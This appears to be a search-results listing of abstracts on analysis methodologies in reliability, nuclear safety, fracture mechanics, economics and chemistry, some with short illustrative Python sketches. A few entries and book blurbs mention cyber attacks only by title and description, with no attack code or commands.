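            filter_eff  : fraction of attack traffic removed by filtering (0..1)
            """
            offered = legit_rate + attack_rate * (1.0 - filter_eff)
            if offered <= capacity:
                return 1.0
            # Under overload, capacity is assumed to be shared in proportion to offered load.
            return capacity / offered

        for filt in (0.0, 0.5, 0.9):
            p = service_probability(legit_rate=200, attack_rate=5000,
                                    capacity=1000, filter_eff=filt)
            print(f"filtering {filt:.0%}: P(served) = {p:.2f}")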

  15. Adapting Job Analysis Methodology to Improve Evaluation Practice

    Science.gov (United States)

    Jenkins, Susan M.; Curtin, Patrick

    2006-01-01

    This article describes how job analysis, a method commonly used in personnel research and organizational psychology, provides a systematic method for documenting program staffing and service delivery that can improve evaluators' knowledge about program operations. Job analysis data can be used to increase evaluators' insight into how staffs…

  16. Methodological Analysis of Gregarious Behaviour of Agents in the Financial Markets

    OpenAIRE

    Solodukhin Stanislav V.

    2013-01-01

    The article considers methodological approaches to the analysis of gregarious (herd) behaviour of agents in the financial markets and also studies the foundations of agent-based modelling of decision-making processes that take the gregarious instinct into consideration.

  17. Montecarlo simulation for a new high resolution elemental analysis methodology

    Energy Technology Data Exchange (ETDEWEB)

    Figueroa S, Rodolfo; Brusa, Daniel; Riveros, Alberto [Universidad de La Frontera, Temuco (Chile). Facultad de Ingenieria y Administracion

    1996-12-31

    Full text. Spectra generated by binary, ternary and multielement matrixes when irradiated by a variable energy photon beam are simulated by means of a Monte Carlo code. Significant jumps in the counting rate are shown when the photon energy is just over the edge associated with each element, because of the emission of characteristic X rays. For a given associated energy, the net height of these jumps depends mainly on the concentration and on the sample absorption coefficient. The spectra were obtained by a monochromatic energy scan considering all the radiation emitted by the sample in a 2π solid angle, associating a single multichannel spectrometer channel to each incident energy (Multichannel Scaling (MCS) mode). The simulated spectra were made with a Monte Carlo simulation software adaptation of the package called PENELOPE (Penetration and Energy Loss of Positrons and Electrons in matter). The results show that it is possible to implement a new high resolution spectroscopy methodology, where a synchrotron would be an ideal source, due to the high intensity and the ability to control the energy of the incident beam. The high energy resolution would be determined by the monochromating system and not by the detection system, which would basically be a photon counter. (author)

  18. Recent Methodologies for Creep Deformation Analysis and Its Life Prediction

    International Nuclear Information System (INIS)

    Kim, Woo-Gon; Park, Jae-Young; Iung

    2016-01-01

    To design high-temperature creeping materials, various creep data are needed for codification, as follows: i) stress vs. creep rupture time for base metals and weldments (average and minimum), ii) stress vs. time to 1% total strain (average), iii) stress vs. time to onset of tertiary creep (minimum), iv) constitutive equations for conducting time- and temperature-dependent stress-strain calculations (average), and v) isochronous stress-strain curves (average). Also, elevated-temperature components such as those used in modern power generation plants are designed using allowable stress under creep conditions. The allowable stress is usually estimated on the basis of up to 10⁵ h creep rupture strength at the operating temperature. The master curve of the “sinh” function was found to have a wider acceptance with good flexibility in the low stress ranges beyond the experimental data. The proposed multi-C method in the LM parameter revealed better life prediction than a single-C method. These improved methodologies can be utilized to accurately predict the long-term creep life or strength of Gen-IV nuclear materials which are designed for a life span of 60 years

  19. Montecarlo simulation for a new high resolution elemental analysis methodology

    International Nuclear Information System (INIS)

    Figueroa S, Rodolfo; Brusa, Daniel; Riveros, Alberto

    1996-01-01

    Full text. Spectra generated by binary, ternary and multielement matrixes when irradiated by a variable energy photon beam are simulated by means of a Monte Carlo code. Significant jumps in the counting rate are shown when the photon energy is just over the edge associated with each element, because of the emission of characteristic X rays. For a given associated energy, the net height of these jumps depends mainly on the concentration and on the sample absorption coefficient. The spectra were obtained by a monochromatic energy scan considering all the radiation emitted by the sample in a 2π solid angle, associating a single multichannel spectrometer channel to each incident energy (Multichannel Scaling (MCS) mode). The simulated spectra were made with a Monte Carlo simulation software adaptation of the package called PENELOPE (Penetration and Energy Loss of Positrons and Electrons in matter). The results show that it is possible to implement a new high resolution spectroscopy methodology, where a synchrotron would be an ideal source, due to the high intensity and the ability to control the energy of the incident beam. The high energy resolution would be determined by the monochromating system and not by the detection system, which would basically be a photon counter. (author)

  20. Eco-efficiency analysis methodology on the example of the chosen polyolefins production

    OpenAIRE

    K. Czaplicka-Kolarz; D. Burchart-Korol; P. Krawczyk

    2010-01-01

    the chosen polyolefins production. The article also presents the main tools of eco-efficiency analysis: Life Cycle Assessment (LCA) and Net Present Value (NPV). Design/methodology/approach: On the basis of the LCA and NPV of high density polyethylene (HDPE) and low density polyethylene (LDPE) production, an eco-efficiency analysis is conducted. Findings: In this article the environmental and economic performance of the chosen polyolefins production was presented. The basic phases of the eco-efficiency methodology...

  1. Uncertainty and sensitivity analysis methodology in a level-I PSA (Probabilistic Safety Assessment)

    International Nuclear Information System (INIS)

    Nunez McLeod, J.E.; Rivera, S.S.

    1997-01-01

    This work presents a methodology for sensitivity and uncertainty analysis, applicable to a level I probabilistic safety assessment. The work covers: the correct association of distributions to parameters, the importance and qualification of expert opinions, the generation of samples according to sample sizes, and the study of the relationships among system variables and the system response. A series of statistical-mathematical techniques are recommended along the development of the analysis methodology, as well as different graphical visualizations for the control of the study. (author)
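
    The sampling-and-correlation step of such an analysis can be sketched briefly: propagate sampled basic-event parameters through the risk model and rank each input by its rank correlation with the response. In the Python sketch below the cut-set equation and all distributions are invented and do not come from a real level-I PSA.

        import numpy as np
        from scipy.stats import spearmanr

        rng = np.random.default_rng(3)
        n = 5000

        # Lognormal basic-event parameters (assumed, illustrative only).
        init_freq    = rng.lognormal(np.log(1e-2), 0.8, n)   # initiator frequency, /yr
        p_pump_fail  = rng.lognormal(np.log(3e-3), 0.6, n)
        p_valve_fail = rng.lognormal(np.log(1e-3), 0.6, n)
        p_operator   = rng.lognormal(np.log(5e-2), 1.0, n)

        # Toy cut-set equation for the system response (core damage frequency).
        cdf = init_freq * (p_pump_fail * p_operator + p_valve_fail)
        print(f"mean = {cdf.mean():.2e}/yr, 95th percentile = {np.percentile(cdf, 95):.2e}/yr")

        # Sensitivity: rank-correlate each input with the response.
        for name, x in [("initiator", init_freq), ("pump", p_pump_fail),
                        ("valve", p_valve_fail), ("operator", p_operator)]:
            rho, _ = spearmanr(x, cdf)
            print(f"{name:9s} Spearman rho = {rho:+.2f}")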

  2. Go-flow: a reliability analysis methodology applicable to piping system

    International Nuclear Information System (INIS)

    Matsuoka, T.; Kobayashi, M.

    1985-01-01

    Since the completion of the Reactor Safety Study, the use of probabilistic risk assessment techniques has been becoming more widespread in the nuclear community. Several analytical methods are used for the reliability analysis of nuclear power plants. The GO methodology is one of these methods. Using the GO methodology, the authors performed a reliability analysis of the emergency decay heat removal system of the nuclear ship Mutsu, in order to examine its applicability to piping systems. Through this analysis, the authors found some disadvantages of the GO methodology. In the GO methodology, the signal is an on-to-off or off-to-on signal; therefore GO finds the time point at which the state of a system changes, and cannot treat a system whose state changes as off-on-off. Several computer runs are required to obtain the time-dependent failure probability of a system. In order to overcome these disadvantages, the authors propose a new analytical methodology: GO-FLOW. In GO-FLOW, the modeling method (chart) and the calculation procedure are similar to those in the GO methodology, but the meaning of signal and time point, and the definitions of operators, are essentially different. In the paper, the GO-FLOW methodology is explained and two examples of the analysis by GO-FLOW are given

  3. Toward a computer-aided methodology for discourse analysis ...

    African Journals Online (AJOL)

    aided methods to discourse analysis”. This project aims to develop an e-learning environment dedicated to documenting, evaluating and teaching the use of corpus linguistic tools suitable for interpretative text analysis. Even though its roots are in ...

  4. Proteome analysis of Saccharomyces cerevisiae: a methodological outline

    DEFF Research Database (Denmark)

    Fey, S J; Nawrocki, A; Görg, A

    1997-01-01

    Proteome analysis offers a unique means of identifying important proteins, characterizing their modifications and beginning to describe their function. This is achieved through the combination of two technologies: protein separation and selection by two-dimensional gel electrophoresis, and protei...

  5. Theoretical and methodological analysis of personality theories of leadership

    OpenAIRE

    Оксана Григорівна Гуменюк

    2016-01-01

    A psychological analysis of personality theories of leadership, which form the basis for other conceptual approaches to understanding the nature of leadership, is conducted. The conceptual approach to leadership is analyzed taking into account the priority of personality theories, including: heroic, psychoanalytic, «trait» theory, charismatic and five-factor. It is noted that the psychological analysis of personality theories is important in understanding the nature of leadership

  6. Methodology Series Module 6: Systematic Reviews and Meta-analysis.

    Science.gov (United States)

    Setia, Maninder Singh

    2016-01-01

    Systematic reviews and meta-analyses have become an important part of biomedical literature, and they provide the "highest level of evidence" for various clinical questions. There are a lot of studies - sometimes with contradictory conclusions - on a particular topic in the literature. Hence, as a clinician, which results will you believe? What will you tell your patient? Which drug is better? A systematic review or a meta-analysis may help us answer these questions. In addition, it may also help us understand the quality of the articles in the literature or the type of studies that have been conducted and published (for example, randomized trials or observational studies). The first step is to identify a research question for the systematic review or meta-analysis. The next step is to identify the articles that will be included in the study. This will be done by searching various databases; it is important that the researcher searches for articles in more than one database. It will also be useful to form a group of researchers and statisticians that have expertise in conducting systematic reviews and meta-analyses before initiating them. We strongly encourage the readers to register their proposed review/meta-analysis with PROSPERO. Finally, these studies should be reported according to the Preferred Reporting Items for Systematic Reviews and Meta-Analyses (PRISMA) checklist.

  7. Phoenix – A model-based Human Reliability Analysis methodology: Qualitative Analysis Procedure

    International Nuclear Information System (INIS)

    Ekanem, Nsimah J.; Mosleh, Ali; Shen, Song-Hua

    2016-01-01

    Phoenix method is an attempt to address various issues in the field of Human Reliability Analysis (HRA). Built on a cognitive human response model, Phoenix incorporates strong elements of current HRA good practices, leverages lessons learned from empirical studies, and takes advantage of the best features of existing and emerging HRA methods. Its original framework was introduced in previous publications. This paper reports on the completed methodology, summarizing the steps and techniques of its qualitative analysis phase. The methodology introduces the “Crew Response Tree” which provides a structure for capturing the context associated with Human Failure Events (HFEs), including errors of omission and commission. It also uses a team-centered version of the Information, Decision and Action cognitive model and “macro-cognitive” abstractions of crew behavior, as well as relevant findings from cognitive psychology literature and operating experience, to identify potential causes of failures and influencing factors during procedure-driven and knowledge-supported crew-plant interactions. The result is the set of identified HFEs and likely scenarios leading to each. The methodology itself is generic in the sense that it is compatible with various quantification methods, and can be adapted for use across different environments including nuclear, oil and gas, aerospace, aviation, and healthcare. - Highlights: • Produces a detailed, consistent, traceable, reproducible and properly documented HRA. • Uses “Crew Response Tree” to capture context associated with Human Failure Events. • Models dependencies between Human Failure Events and influencing factors. • Provides a human performance model for relating context to performance. • Provides a framework for relating Crew Failure Modes to its influencing factors.

  8. Methodology for risk-based analysis of technical specifications

    International Nuclear Information System (INIS)

    Vesely, W.E.; Gaertner, J.P.; Wagner, D.P.

    1985-01-01

    Part of the effort by EPRI to apply probabilistic risk assessment methods and results to the solution of utility problems involves the investigation of methods for risk-based analysis of technical specifications. The culmination of this investigation is the SOCRATES computer code developed by Battelle's Columbus Laboratories to assist in the evaluation of technical specifications of nuclear power plants. The program is designed to use information found in PRAs to re-evaluate risk for changes in component allowed outage times (AOTs) and surveillance test intervals (STIs). The SOCRATES program is a unique and important tool for technical specification evaluations. The detailed component unavailability model allows a detailed analysis of AOT and STI contributions to risk. Explicit equations allow fast and inexpensive calculations. Because the code is designed to accept ranges of parameters and to save results of calculations that do not change during the analysis, sensitivity studies are efficiently performed and results are clearly displayed
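
    The flavour of an AOT/STI evaluation can be conveyed with a textbook standby-component unavailability model: failures accumulating between surveillance tests, downtime during the test itself, and outage time when repair is needed. The Python sketch below uses that generic approximation with invented numbers; it is not the detailed component unavailability model implemented in SOCRATES.

        def average_unavailability(lmbda, sti_h, aot_h, test_dur_h=2.0, p_maint=0.02):
            """Simple standby-component unavailability approximation.

            lmbda      : standby failure rate (/h)
            sti_h      : surveillance test interval (h)
            aot_h      : allowed outage time taken when repair is needed (h)
            test_dur_h : time the component is unavailable during the test (h)
            p_maint    : probability that a test leads to corrective maintenance
            """
            q_standby = lmbda * sti_h / 2.0      # failed-between-tests contribution
            q_test    = test_dur_h / sti_h       # test downtime contribution
            q_repair  = p_maint * aot_h / sti_h  # repair/outage contribution
            return q_standby + q_test + q_repair

        base    = average_unavailability(lmbda=1e-5, sti_h=720,  aot_h=72)
        relaxed = average_unavailability(lmbda=1e-5, sti_h=2160, aot_h=168)
        print(f"base q = {base:.2e}, relaxed STI/AOT q = {relaxed:.2e}, "
              f"ratio = {relaxed / base:.2f}")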

  9. Uncertainty analysis on probabilistic fracture mechanics assessment methodology

    International Nuclear Information System (INIS)

    Rastogi, Rohit; Vinod, Gopika; Chandra, Vikas; Bhasin, Vivek; Babar, A.K.; Rao, V.V.S.S.; Vaze, K.K.; Kushwaha, H.S.; Venkat-Raj, V.

    1999-01-01

    Fracture mechanics has found extensive use in the design of components and in assessing fitness for purpose and residual life of operating components. Since defect size and material properties are statistically distributed, various probabilistic approaches have been employed for the computation of fracture probability. Monte Carlo simulation is one such procedure for analysing fracture probability. This paper deals with uncertainty analysis using Monte Carlo simulation methods. These methods were developed based on the R6 failure assessment procedure, which has been widely used in analysing the integrity of structures. The application of the method is illustrated with a case study. (author)
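
    A heavily simplified Monte Carlo sketch of this kind of calculation is shown below for illustration only: it samples a crack depth, an applied stress, and a fracture toughness, and counts how often a simple stress-intensity criterion is exceeded. The actual R6 procedure uses the full failure assessment diagram in terms of Kr and Lr; all distributions and values here are hypothetical.

        import numpy as np

        rng = np.random.default_rng(seed=1)
        n = 200_000

        # Hypothetical statistical inputs
        a = rng.lognormal(mean=np.log(2.0e-3), sigma=0.5, size=n)    # crack depth [m]
        k_mat = rng.normal(loc=120.0, scale=15.0, size=n)            # fracture toughness [MPa*sqrt(m)]
        sigma = rng.normal(loc=200.0, scale=20.0, size=n)            # applied stress [MPa]
        Y = 1.12                                                     # geometry factor (surface crack)

        k_applied = Y * sigma * np.sqrt(np.pi * a)                   # stress intensity factor
        p_fail = np.mean(k_applied > k_mat)                          # crude fracture criterion
        se = np.sqrt(p_fail * (1.0 - p_fail) / n)                    # sampling uncertainty

        print(f"estimated failure probability = {p_fail:.2e} +/- {se:.1e}")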

  10. Full cost accounting in the analysis of separated waste collection efficiency: A methodological proposal.

    Science.gov (United States)

    D'Onza, Giuseppe; Greco, Giulio; Allegrini, Marco

    2016-02-01

    Recycling implies additional costs for separated municipal solid waste (MSW) collection. The aim of the present study is to propose and implement a management tool - the full cost accounting (FCA) method - to calculate the full collection costs of different types of waste. Our analysis aims for a better understanding of the difficulties of putting FCA into practice in the MSW sector. We propose a FCA methodology that uses standard cost and actual quantities to calculate the collection costs of separate and undifferentiated waste. Our methodology allows cost efficiency analysis and benchmarking, overcoming problems related to firm-specific accounting choices, earnings management policies and purchase policies. Our methodology allows benchmarking and variance analysis that can be used to identify the causes of off-standards performance and guide managers to deploy resources more efficiently. Our methodology can be implemented by companies lacking a sophisticated management accounting system. Copyright © 2015 Elsevier Ltd. All rights reserved.
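
    To make the "standard cost times actual quantity" idea concrete, here is a small illustrative calculation, not taken from the paper: each collection stream is priced at a hypothetical standard unit cost, compared with hypothetical actual spending, and the variance per stream is reported.

        # Hypothetical standard unit costs [EUR per tonne collected] and actual data.
        standard_cost = {"paper": 95.0, "glass": 60.0, "organic": 120.0, "residual": 80.0}
        actual_tonnes = {"paper": 1500, "glass": 900, "organic": 2100, "residual": 4800}
        actual_cost = {"paper": 155_000, "glass": 51_000, "organic": 262_000, "residual": 371_000}

        total_std, total_act = 0.0, 0.0
        for stream in standard_cost:
            std = standard_cost[stream] * actual_tonnes[stream]   # full cost at standard
            act = actual_cost[stream]
            variance = act - std                                  # positive = off-standard overspend
            total_std += std
            total_act += act
            print(f"{stream:9s} standard={std:10.0f}  actual={act:10.0f}  variance={variance:+9.0f}")

        print(f"{'TOTAL':9s} standard={total_std:10.0f}  actual={total_act:10.0f}  "
              f"variance={total_act - total_std:+9.0f}")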

  11. Analysis of market competitive structure: The new methodological approach based in the using

    International Nuclear Information System (INIS)

    Romero de la Fuente, J.; Yague Guillen, M. J.

    2007-01-01

    This paper proposes a new methodological approach to identify market competitive structure, applying usage situation concept in positioning analysis. Dimensions used by consumer to classify products are identified using Correspondence Analysis and competitive groups are formed. Results are validated with Discriminant Analysis. (Author) 23 refs

  12. BWR stability analysis: methodology of the stability analysis and results of PSI for the NEA/NCR benchmark task

    International Nuclear Information System (INIS)

    Hennig, D.; Nechvatal, L.

    1996-09-01

    The report describes the PSI stability analysis methodology and the validation of this methodology based on the international OECD/NEA BWR stability benchmark task. In the frame of this work, the stability properties of some operation points of the NPP Ringhals 1 have been analysed and compared with the experimental results. (author) figs., tabs., 45 refs

  13. Physical data generation methodology for return-to-power steam line break analysis

    Energy Technology Data Exchange (ETDEWEB)

    Zee, Sung Kyun; Lee, Chung Chan; Lee, Chang Kue [Korea Atomic Energy Research Institute, Taejon (Korea, Republic of)

    1996-02-01

    The current methodology for generating physics data for steam line break accident analysis of CE-type nuclear plants such as Yonggwang Unit 3 is valid only if the core does not return to criticality after shutdown. The methodology therefore requires a tremendous amount of net scram worth, especially at the end of the cycle when the moderator temperature coefficient is most negative. Hence, a new methodology is needed to obtain reasonably conservative physics data when the reactor returns to a power condition. The current methodology uses ROCS, which includes only a closed channel model, and it is well known that the closed channel model estimates the core reactivity as too negative when the core flow rate is low. Therefore, a conservative methodology is presented which utilizes the open channel 3D HERMITE model. A return-to-power reactivity credit is produced to supplement the reactivity table generated by the closed channel model. Other data include the hot channel axial power shape, peaking factor and maximum quality for DNBR analysis, as well as a pin census for radiological consequence analysis. 48 figs., 22 tabs., 18 refs. (Author)

  14. SAFETY ANALYSIS METHODOLOGY FOR AGED CANDU® 6 NUCLEAR REACTORS

    Directory of Open Access Journals (Sweden)

    WOLFGANG HARTMANN

    2013-10-01

    Full Text Available This paper deals with the Safety Analysis for CANDU® 6 nuclear reactors as affected by main Heat Transport System (HTS) aging. Operational and aging related changes of the HTS throughout its lifetime may lead to restrictions in certain safety system settings and hence some restriction in performance under certain conditions. A step in confirming safe reactor operation is the tracking of relevant data and their corresponding interpretation by the use of appropriate thermalhydraulic analytic models. Safety analyses ranging from the assessment of safety limits associated with the prevention of intermittent fuel sheath dryout for a slow Loss of Regulation (LOR) analysis and fission gas release after a fuel failure are summarized. Specifically for fission gas release, the thermalhydraulic analysis for a fresh core and an 11 Effective Full Power Years (EFPY) aged core was summarized, leading to the most severe stagnation break sizes for the inlet feeder break and the channel failure time. Associated coolant conditions provide the input data for fuel analyses. Based on the thermalhydraulic data, the fission product inventory under normal operating conditions may be calculated for both fresh and aged cores, and the fission gas release may be evaluated during the transient. This analysis plays a major role in determining possible radiation doses to the public after postulated accidents have occurred.

  15. Methodological aspects in the analysis of spontaneously produced sputum

    NARCIS (Netherlands)

    Out, T. A.; Jansen, H. M.; Lutter, R.

    2001-01-01

    Analysis of sputum as a specimen containing inflammatory indices has gained considerable interest during the last decade with focus on chronic bronchitis (CB) with or without airway obstruction, cystic fibrosis (CF), chronic obstructive pulmonary disease (COPD) and asthma. The nature of the

  16. Recent methodology in the phytochemical analysis of ginseng

    NARCIS (Netherlands)

    Angelova, N.; Kong, H.-W.; Heijden, R. van de; Yang, S.-Y.; Choi, Y.H.; Kim, H.K.; Wang, M.; Hankemeier, T.; Greef, J. van der; Xu, G.; Verpoorte, R.

    2008-01-01

    This review summarises the most recent developments in ginseng analysis, in particular the novel approaches in sample pre-treatment and the use of high-performance liquid-chromatography-mass spectrometry. The review also presents novel data on analysing ginseng extracts by nuclear magnetic resonance

  17. Important Literature in Endocrinology: Citation Analysis and Historical Methodology.

    Science.gov (United States)

    Hurt, C. D.

    1982-01-01

    Results of a study comparing two approaches to the identification of important literature in endocrinology reveals that association between ranking of cited items using the two methods is not statistically significant and use of citation or historical analysis alone will not result in same set of literature. Forty-two sources are appended. (EJS)

  18. Boolean comparative analysis of qualitative data : a methodological note

    NARCIS (Netherlands)

    Romme, A.G.L.

    1995-01-01

    This paper explores the use of Boolean logic in the analysis of qualitative data, especially on the basis of so-called process theories. Process theories treat independent variables as necessary conditions which are binary rather than variable in nature, while the dependent variable is a final

  19. CANDU safety analysis system establishment; development of trip coverage and multi-dimensional hydrogen analysis methodology

    Energy Technology Data Exchange (ETDEWEB)

    Choi, Jong Ho; Ohn, M. Y.; Cho, C. H. [KOPEC, Taejon (Korea)

    2002-03-01

    The trip coverage analysis model requires the geometry network for the primary and secondary circuits as well as the plant control system in order to simulate all possible plant operating conditions throughout the plant life. The model was validated against power maneuvering and the Wolsong 4 commissioning test. The trip coverage map was produced for the large break loss of coolant accident and the complete loss of class IV power event. Reliable multi-dimensional hydrogen analysis requires a high capability for thermal hydraulic modelling. To acquire such a capability and to verify the applicability of the GOTHIC code, assessments of the heat transfer model and of the hydrogen mixing and combustion models were performed. An assessment methodology for flame acceleration and deflagration-to-detonation transition is also established. 22 refs., 120 figs., 31 tabs. (Author)

  20. Big and complex data analysis methodologies and applications

    CERN Document Server

    2017-01-01

    This volume conveys some of the surprises, puzzles and success stories in high-dimensional and complex data analysis and related fields. Its peer-reviewed contributions showcase recent advances in variable selection, estimation and prediction strategies for a host of useful models, as well as essential new developments in the field. The continued and rapid advancement of modern technology now allows scientists to collect data of increasingly unprecedented size and complexity. Examples include epigenomic data, genomic data, proteomic data, high-resolution image data, high-frequency financial data, functional and longitudinal data, and network data. Simultaneous variable selection and estimation is one of the key statistical problems involved in analyzing such big and complex data. The purpose of this book is to stimulate research and foster interaction between researchers in the area of high-dimensional data analysis. More concretely, its goals are to: 1) highlight and expand the breadth of existing methods in...

  1. Environmental analysis applied to schools. Methodologies for data acquisition

    International Nuclear Information System (INIS)

    Andriola, L.; Ceccacci, R.

    2001-01-01

    The environmental analysis is the basis of environmental management for organizations and is considered the first step in EMAS. It allows an organization to identify and deal with environmental issues and to gain a clear knowledge of its environmental performance. Schools can be counted among such organizations. Nevertheless, the complexity of environmental issues and applicable regulations makes it very difficult for a school that wants to implement an environmental management system (EMAS, ISO 14001, etc.) to face this first step. An instrument has therefore been defined that is simple yet complete and coherent with the reference standard, allowing schools to choose their own process for elaborating the initial environmental review. This instrument consists essentially of cards that, when completed, facilitate the drafting of the environmental analysis report.

  2. Development of analysis methodology for hot leg break mass and energy release

    International Nuclear Information System (INIS)

    Song, Jin Ho; Kim, Cheol Woo; Kwon, Young Min; Kim, Sook Kwan

    1995-04-01

    A study for the development of an analysis methodology for hot leg break mass and energy release is performed. For the blowdown period a modified CEFLASH-4A methodology is suggested, and for the post-blowdown period a modified CONTRAST boil-off model is suggested. By using these computer codes, improved mass and energy release data are generated. A RELAP5/MOD3 analysis is also performed, and finally the FLOOD-3 computer code has been modified for use in the analysis of the hot leg break. The results of the analysis using the modified FLOOD-3 are reasonable, as expected, and their trends are good. 66 figs., 8 tabs. (Author)

  3. Exploratory market structure analysis. Topology-sensitive methodology.

    OpenAIRE

    Mazanec, Josef

    1999-01-01

    Given the recent abundance of brand choice data from scanner panels, market researchers have neglected the measurement and analysis of perceptions. Heterogeneity of perceptions is still a largely unexplored issue in market structure and segmentation studies. Over the last decade various parametric approaches toward modelling segmented perception-preference structures, such as combined MDS and Latent Class procedures, have been introduced. These methods, however, are not tailored for qualitative ...

  4. On the methodology of the analysis of Moessbauer spectra

    International Nuclear Information System (INIS)

    Vandenberghe, R.E.; Grave, E. de; Bakker, P.M.A. de

    1994-01-01

    A review is presented of the direct fitting procedures which are used in the analysis of Moessbauer spectra. Direct lineshape fitting with alternative profiles as well as shape-dependent, shape-independent and quasi shape-independent distribution fitting methods all can easily be incorporated in one computer program scheme yielding a large versatility for modification and/or extension of the programs according to specific spectra. (orig.)
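
    As a toy illustration of direct lineshape fitting (not one of the reviewed programs), the sketch below fits a single Lorentzian doublet to a synthetic transmission spectrum with scipy; line positions, widths, and counting statistics are invented.

        import numpy as np
        from scipy.optimize import curve_fit

        def doublet(v, baseline, depth, center, split, width):
            """Transmission spectrum: baseline minus two Lorentzian absorption lines."""
            lor = lambda v0: depth / (1.0 + ((v - v0) / (width / 2.0)) ** 2)
            return baseline - lor(center - split / 2.0) - lor(center + split / 2.0)

        rng = np.random.default_rng(0)
        v = np.linspace(-4, 4, 256)                                   # velocity axis [mm/s]
        true = doublet(v, 1.0e5, 5.0e3, 0.3, 1.7, 0.25)
        counts = rng.poisson(true).astype(float)                      # synthetic spectrum

        p0 = [counts.max(), counts.max() - counts.min(), 0.0, 1.5, 0.3]
        popt, pcov = curve_fit(doublet, v, counts, p0=p0, sigma=np.sqrt(counts))
        perr = np.sqrt(np.diag(pcov))

        for name, val, err in zip(["baseline", "depth", "center", "splitting", "width"], popt, perr):
            print(f"{name:9s} = {val:10.3f} +/- {err:.3f}")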

  5. Methodological issues underlying multiple decrement life table analysis.

    Science.gov (United States)

    Mode, C J; Avery, R C; Littman, G S; Potter, R G

    1977-02-01

    In this paper, the actuarial method of multiple decrement life table analysis of censored, longitudinal data is examined. The discussion is organized in terms of the first segment of usage of an intrauterine device. Weaknesses of the actuarial approach are pointed out, and an alternative approach, based on the classical model of competing risks, is proposed. Finally, the actuarial and the alternative method of analyzing censored data are compared, using data from the Taichung Medical Study on Intrauterine Devices.

  6. Applications of the TSUNAMI sensitivity and uncertainty analysis methodology

    International Nuclear Information System (INIS)

    Rearden, Bradley T.; Hopper, Calvin M.; Elam, Karla R.; Goluoglu, Sedat; Parks, Cecil V.

    2003-01-01

    The TSUNAMI sensitivity and uncertainty analysis tools under development for the SCALE code system have recently been applied in four criticality safety studies. TSUNAMI is used to identify applicable benchmark experiments for criticality code validation, assist in the design of new critical experiments for a particular need, reevaluate previously computed computational biases, and assess the validation coverage and propose a penalty for noncoverage for a specific application. (author)

  7. Evaluation of Crosstalk Attacks in Access Networks

    DEFF Research Database (Denmark)

    Wagner, Christoph; Eiselt, Michael; Grobe, Klaus

    2016-01-01

    WDM-PON systems regained interest as low-cost solution for metro and access networks. We present a comparative analysis of resilience of wavelength-selective and wavelength-routed architectures against crosstalk attackers. We compare the vulnerability of these architectures against attacks...

  8. Seven Deadliest Microsoft Attacks

    CERN Document Server

    Kraus, Rob; Borkin, Mike; Alpern, Naomi

    2010-01-01

    Do you need to keep up with the latest hacks, attacks, and exploits affecting Microsoft products? Then you need Seven Deadliest Microsoft Attacks. This book pinpoints the most dangerous hacks and exploits specific to Microsoft applications, laying out the anatomy of these attacks including how to make your system more secure. You will discover the best ways to defend against these vicious hacks with step-by-step instruction and learn techniques to make your computer and network impenetrable. Windows Operating System-Password Attacks; Active Directory-Escalat

  9. Transient Ischemic Attack

    Medline Plus

  10. Seven deadliest USB attacks

    CERN Document Server

    Anderson, Brian

    2010-01-01

    Do you need to keep up with the latest hacks, attacks, and exploits affecting USB technology? Then you need Seven Deadliest USB Attacks. This book pinpoints the most dangerous hacks and exploits specific to USB, laying out the anatomy of these attacks including how to make your system more secure. You will discover the best ways to defend against these vicious hacks with step-by-step instruction and learn techniques to make your computer and network impenetrable. Attacks detailed in this book include: USB Hacksaw; USB Switchblade; USB Based Virus/Malicious Code Launch; USB Device Overflow; RAMdum

  11. Final report : impacts analysis for cyber attack on electric power systems (National SCADA Test Bed FY08).

    Energy Technology Data Exchange (ETDEWEB)

    Phillips, Laurence R.; Richardson, Bryan T.; Stamp, Jason Edwin; LaViolette, Randall A.

    2009-02-01

    To analyze the risks due to cyber attack against control systems used in the United States electrical infrastructure, new algorithms are needed to determine the possible impacts. This research is studying the Reliability Impact of Cyber Attack (RICA) in a two-pronged approach. First, malevolent cyber actions are analyzed in terms of reduced grid reliability. Second, power system impacts are investigated using an abstraction of the grid's dynamic model. This second year of research extends the work done during the first year.

  12. Development of Methodology for Spent Fuel Pool Severe Accident Analysis Using MELCOR Program

    Energy Technology Data Exchange (ETDEWEB)

    Kim, Won-Tae; Shin, Jae-Uk [RETech. Co. LTD., Yongin (Korea, Republic of); Ahn, Kwang-Il [KAERI, Daejeon (Korea, Republic of)

    2015-05-15

    The general reason why SFP severe accident analysis has to be considered is that there is a potentially great risk due to the huge number of fuel assemblies and the absence of a containment around the SFP building. In most cases, the SFP building is vulnerable to external damage or attack. On the other hand, the low decay heat of the fuel assemblies and the great deal of water involved may make the accident processes slow compared to an accident in the reactor core. In short, the severity of the consequences means that SFP risk management cannot be excluded from consideration. The U.S. Nuclear Regulatory Commission has performed consequence studies of postulated spent fuel pool accidents. The Fukushima-Daiichi accident has accelerated the need for such consequence studies, causing the nuclear industry and regulatory bodies to reexamine several assumptions concerning beyond-design-basis events such as a station blackout. The tsunami brought about a loss of coolant accident, leading to the explosion of hydrogen in the SFP building. Analyses of SFP accident processes in the case of a loss of coolant with no heat removal have been performed. Few studies, however, have focused on the long-term progression of an SFP severe accident with no mitigation action such as water makeup to the SFP. The USNRC and OECD have worked together to examine the behavior of PWR fuel assemblies under severe accident conditions in a spent fuel rack. In support of the investigation, several new features have been added to the MELCOR model to simulate both a BWR fuel assembly and a PWR 17 x 17 assembly in a spent fuel pool rack undergoing severe accident conditions. The purpose of the study in this paper is to develop a methodology for the long-term analysis of a plant-level SFP severe accident by using the new-featured MELCOR program for the OPR-1000 Nuclear Power Plant. The study is to investigate the ability of MELCOR to predict the entire process of SFP severe accident phenomena including the molten corium and concrete reaction. The

  13. Effectiveness of Trigger Point Manual Treatment on the Frequency, Intensity, and Duration of Attacks in Primary Headaches: A Systematic Review and Meta-Analysis of Randomized Controlled Trials

    Directory of Open Access Journals (Sweden)

    Luca Falsiroli Maistrello

    2018-04-01

